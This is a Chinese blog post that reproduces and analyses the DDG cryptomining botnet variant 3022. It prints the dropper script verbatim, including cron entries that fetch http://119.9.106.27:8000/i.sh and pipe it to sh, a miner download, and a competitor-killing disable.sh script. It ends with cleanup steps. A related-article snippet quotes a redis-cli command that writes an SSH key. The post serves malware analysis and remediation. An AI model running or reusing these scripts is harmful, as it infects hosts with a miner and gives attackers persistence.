DDG全家桶之3022

最新推荐文章于 2025-05-23 21:14:30 发布
最新推荐文章于 2025-05-23 21:14:30 发布
阅读量273 收藏 2
点赞数 1
文章标签: awk php
原文链接:http://www.cnblogs.com/Id3al/p/10706324.html
版权

本篇文章主要根据360Netlab新出的DDG分析文档来复现新变种3022,会涉及部分分析和清除的方法,
本篇文章只用于学习交流,为广大受害者提供清除思路 ,请勿用于非法用途,产生一切后果与作者无关
详情请参考文档:https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/

一、下载

下载脚本:http://119.9.106.27:8000/i.sh(i.sh名称位ddgs一贯的作风)

样本地址:119.9.106.27:8000/static/3022/



首先下载i.sh脚本分析下里边的内容

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh" | crontab -

echo "" > /var/spool/cron/root

echo "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root

echo "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep lrnbbce || rm -rf lrnbbce
if [ ! -f "lrnbbce" ]; then
    wget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O lrnbbce

fi
chmod +x lrnbbce
$(pwd)/lrnbbce || /usr/bin/lrnbbce || /usr/libexec/lrnbbce || /usr/local/bin/lrnbbce || lrnbbce || ./lrnbbce || /tmp/lrnbbce

ps auxf | grep -v grep | grep lrnbbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep lrnbbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep lrnbbcd | awk '{print $2}' | xargs kill -9`

ddg木马的老套路了,写环境变量、添加到定时任务、下载矿机执行、删除禁用其他挖矿木马(挖矿行业竞争很激烈了)
从3014版本开始增加了云端配置下发 disable.sh 来集中干掉竞争对手,
脚本地址:http://119.9.106.27:8000/static/disable.sh,内容如下

 
  
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /opt/yilu/work/{xig,xige} /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chmod -w /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64

rm -rf /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
touch /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chmod -rw /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chattr +i /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux


if [ -e "/tmp/gates.lod" ]; then
    rm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)
    kill -9 $(cat /tmp/gates.lod)
    rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)
    kill -9 $(cat /tmp/moni.lod)
    rm -rf /tmp/{gates,moni}.lod
fi

ps auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9

 
 
 
 
把同类的挖矿进程放到了这个脚本中,来杀掉yilu、以及BillGate家族的gates进程等
不过这都是之前版本的,现在这个更高级了,直接下发二进制程序disable
 
 
这个disable的作用可以参考下360的那篇文章:图片来自360netlab博客
 
 
 
 
 
 
 


目前为了阻止其它挖矿程序ddg3022主要做了以下措施
1.修改Hosts文件,阻止其它挖矿程序的下发
 
 
2.杀掉其它挖矿程序
3.使用二进制文件disable
 
 
二、运行复现
 
 
 接下来执行脚本开始我们的复现过程crontab已经写入

 
 
CPU已经满载,挖矿程序已经在运行
 
 
看下/tmp目录下的样本文件
 
 
 
 
 
 
 
三、清除
 
 
老套路,挖矿木马干什么咱们反着来就是了
 
 
删除/var/spool/cron/crontab/root,/var/spool/cron/root文件中 echo "*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root
 
 
删除/tmp/6Tx3Wq,/tmp/disable,/usr/bin/lrnbbce
 
 
kill掉进程:6Tx3Wq,lrnbbce
 
 
此时挖矿程序已经清理,后续可以删除被增加的hosts等文件
 
 
 
 
 
参考文章:
 
 
https://blog.netlab.360.com/https-blog-netlab-360-com-a-fast-ddg-3014-analyze/
https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/
 
 
 
 
 
 
 

 

转载于:https://www.cnblogs.com/Id3al/p/10706324.html

                

        




    

  



    

      

        

            

              
                
                  bansu1062
                
              
            

            

                关注
              
            

        

        

          
      

      










                



	

		

			

				
					
Centos系统简单的病毒处理

				
			

			

				

					从删库到跑路吧~
				

				

					08-10
					
					8190
					
				

			

		

		

			
				
第一次遇到服务器被植入了挖矿程序,慌的一匹。下面说说我处理这个故障的简单操作,

每天早晨上班第一件事就是打开监控,查看服务器资源占用情况,发现我服务器的双核CPU一直占用率100%。

通过xshell连接,使用top命令再次查看确认



这个xig不知道是什么鬼程序,通过群里的大佬说使用 lsof  -p  16241(PID号) 查看下这个进程调用了那些程序;



看完这些才发现还是一脸...

			
		

	



                

            
              



	

		

			

				
					
Flex ddG Tutorial Flex ddG 教程

				
			

			

				

					04-28
				

			

		

		

			
				
Flex ddG Tutorial Flex ddG 教程相关文件包含两个示例

			
		

	



              


  
              

                


	

		

			

				
					
Linux挖矿病毒排查(通过redis入侵服务器原理)

				
			

			

				

					程序员阿飘 的博客
				

				

					01-11
					
					1687
					
				

			

		

		

			
				
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;

			
		

	





	

		

			

				
					
开源项目教程:ddg

				
			

			

				

					gitblog_00534的博客
				

				

					09-03
					
					274
					
				

			

		

		

			
				
开源项目教程:ddg
 ddgDuckDuckGo zero-click info API for your command-line项目地址:https://gitcode.com/gh_mirrors/dd/ddg 1. 项目的目录结构及介绍
ddg/
├── README.md
├── src/
│   ├── main.py
│   ├── config.py
│   ├── utils/...

			
		

	



		

			
		



	

		

			

				
					
360默认开启p2p升级,可在设置中关闭,防止别人从自己电脑上下载升级包

				
			

			

				

					wmnmtm的专栏
				

				

					09-28
					
					925
					
				

			

		

		

			
				
  今天一开机,发现几个上传链接,原来是P2P共享了,现在的软件越来越可恶了,什么事都干得出来。全偷偷弄成默认的。 

			
		

	





	

		

			

				
					
挖矿病毒 解决思路 xmr

				
			

			

				

					weixin_34361881的博客
				

				

					11-26
					
					2285
					
				

			

		

		

			
				
基本上通过服务器挖矿只能利用cpu的性能了,所以 top查看cpu利用率,但是程序会影藏,让你看不见,解决:删除/usr/local/lib/libntp.so ,后面ssh登录会出现错误提示,解决方法:编辑 .bashrc检查启动脚本 /etc/cron.d/root  有可能会新建文件夹并影藏,使用ls -a 查看。检查/tmp路径下文件,删除/tmp/kworkerds使用top查看pid,...

			
		

	





	

		

			

				
					
Java精选面试Spring全家,通往BAT必备法宝,下载地址甩给你

				
			

			

				

					2401_84049001的博客
				

				

					05-05
					
					725
					
				

			

		

		

			
				
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数Java工程师,想要提升技能,往往是自己摸索成长,自己不成体系的自学效果低效漫长且无助。因此收集整理了一份《2024年Java开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。

			
		

	





	

		

			

				
					
五面阿里拿下飞猪事业部offer,2024新鲜出炉阿里巴巴面试真题

				
			

			

				

					2401_84407923的博客
				

				

					04-20
					
					723
					
				

			

		

		

			
				
25. Volatile是怎么实现可见性的26. 介绍下JMM27. Happen before了解吗28. A happen before B,意味着A一定在B之前执行吗29. 你做过的最难的项目中,最难的任务是什么,怎么解决的。

			
		

	





	

		

			

				
					
MySQL万字精华总结-+-面试100-问,吊打面试官绰绰有余(2)

				
			

			

				

					qinglp的博客
				

				

					05-03
					
					713
					
				

			

		

		

			
				
Java架构进阶面试及知识点文档笔记这份文档共498页,其中包括Java集合,并发编程,JVM,Dubbo,Redis,Spring全家,MySQL,Kafka等面试解析及知识点整理Java分布式高级面试问题解析文档其中都是包括分布式的面试问题解析,内容有分布式消息队列,Redis缓存,分库分表,微服务架构,分布式高可用,读写分离等等!互联网Java程序员面试必备问题解析及文档学习笔记Java架构进阶视频解析合集《一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码》

			
		

	





	

		

			

				
					
flex_ddG_tutorial

				
			

			

				

					05-27
				

			

		

		

			
				
Flex ddG教程 该教程的最新版本。 介绍 在本活动中,您将利用Rosetta中的Flex ddG 协议对突变后的结合自由能(接口ΔΔG)进行计算建模和预测。  该协议使用“ backrub”协议在实现,以采样构象多样性。  建议您使用...

			
		

	





	

		

			

				
					
Halcon联合MFC之高斯沿梯度的二阶导——2nd_ddg边缘检测

				
			

			

				

					06-27
				

			

		

		

			
				
高斯沿梯度的二阶导——2nd_ddg边缘检测 所用算子: derivate_gauss (Operator) derivate_gauss — Convolve an image with derivatives of the Gaussian.

			
		

	





	

		

			

				
					
ddg-client:允许轻松快速地从duckduckgo(ddg.gg)搜索引擎获取结果

				
			

			

				

					05-11
				

			

		

		

			
				
**ddg-client: 让DuckDuckGo搜索更便捷**  `ddg-client` 是一个专为JavaScript开发的库,其主要目标是简化用户通过DuckDuckGo搜索引擎获取信息的过程。DuckDuckGo(ddg.gg)是一个注重隐私的搜索引擎,它不追踪用户...

			
		

	





	

		

			

				
					
DDG最新变种3014样本分析

				
			

			

				

					12-20
				

			

		

		

			
				
DDG最新变种3014样本分析

			
		

	





	

		

			

				
					
Linux管道工具

				
			

			

				

					Aliano217的博客
				

				

					05-20
					
					747
					
				

			

		

		

			
				
通过灵活组合管道和这三个工具,可实现从简单过滤到复杂数据处理的全方位需求。建议从单命令入手,逐步尝试多命令串联,最终掌握自动化文本处理流程。将前一个命令的输出作为后一个命令的输入,实现。可实现高效的数据流转。)是文本处理的瑞士军刀,结合。Linux管道工具(

			
		

	





	

		

			

				
					
关于服务器资源的监控和告警推行

				
			

			

				

					javesbo的博客
				

				

					05-21
					
					312
					
				

			

		

		

			
				
4 先关服务的部署,我使用的spug是docker的一键部署,然后普罗米修斯和grafana是到官网下载的tar包解压部署使用的。echo "服务器监控,目录 $dir 的磁盘使用率过高: ${usage}%"echo "服务器监控,目录 $dir 的磁盘使用正常: ${usage}%"echo "服务器监控,内存使用率过高: ${memory_usage}%"echo "服务器监控,内存使用正常: ${memory_usage}%"echo "无法正确获取目录 $dir 的磁盘使用率"

			
		

	





	

		

			

				
					
SHELL练习题(1-11题)记录(牛客)

				
			

			

				

					m0_73062138的博客
				

				

					05-19
					
					923
					
				

			

		

		

			
				
cat demo | awk 'NR>=5{print $0}'    //NR:代表当前处理的行号。

			
		

	





	

		

			

				
					
日志分析-IIS日志分析

					
最新发布

				
			

			

				

					qq_74240553的博客
				

				

					05-23
					
					214
					
				

			

		

		

			
				
1、要了解Windows的IIS服务器日志一般存放的文件路径 c:\inetpub\logs2、筛选日志可以使用相关编辑器如:sublimenotepad++3、熟练使用awk,快速处理有规律的web日志,定位路径,请求方式4、学会利用搜搜引擎,一般网站被入侵,很大概率都是利用nday,学会搜索,能够快速以攻击者的角度排查漏洞5、下载源码,进行D盾漏扫,快速排查后门。

			
		

	





	

		

			

				
					
day019-特殊符号、正则表达式与三剑客

				
			

			

				

					输能力,不输人品 !
				

				

					05-21
					
					1010
					
				

			

		

		

			
				
tr接受标准输入的数据,将数据中的小写字符都替换成本大写字符

3.2.3 xargs:参数转换

xargs的作用:从标准输入接受多个参数并转换成多行
seq num:形成一列的序列数字


3.2.4 标准全量追加重定向

>>oldboy.log 2>&1
&>>oldboy.log


4. 正则表达式





正则表达式
符号
命令




基础正则
^、&、.、*、[]
grep、sed、awk


扩展正则
|、+、{}、()、?
egrep/grep -E、sed -r、awk


4.1

			
		

	





	

		

			

				
					
如何在WordPress网站上添加即时聊天功能

				
			

			

				

					
				

				

					05-20
					
					1129
					
				

			

		

		

			
				
在 WordPress 网站上添加即时聊天功能可以显著提升用户体验和业务转化率。即时聊天不仅能够实现与客户的实时互动,还能通过人工智能和自动化功能提供24/7全天候支持,帮助提高销售转化率并优化客户服务流程。本文介绍了如何在 WordPress 网站上使用 Tidio 插件添加即时聊天功能,包括账户创建、插件安装、聊天小工具定制和测试等步骤。此外,还探讨了其他即时聊天插件选项,如 HubSpot、JivoChat 和 LiveChat,以满足不同需求。通过即时聊天功能,企业可以更好地与客户互动,提升服务质量

			
		

	





	

		

			

				
					
python ddg

				
			

			

				

					05-13
				

			

		

		

			
				
我不太明白您说的“python ddg”是指什么,不过我可以为您介绍一下Python编程语言。

Python是一种面向对象、解释型、动态类型的高级编程语言,具有简单易学、易读易写的特点。它广泛应用于Web开发、数据科学、人工智能、机器学习、科学计算等领域。

Python的语法简洁,代码可读性强,支持多种编程范式(如面向对象、函数式编程等),拥有丰富的标准库和第三方库,能够大大提高编程效率。

同时,Python还有着强大的社区支持,开源生态系统非常完善。如果您想学习Python编程,可以从官方网站下载Python解释器和相关工具,并查看Python官方文档或相关书籍进行学习。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值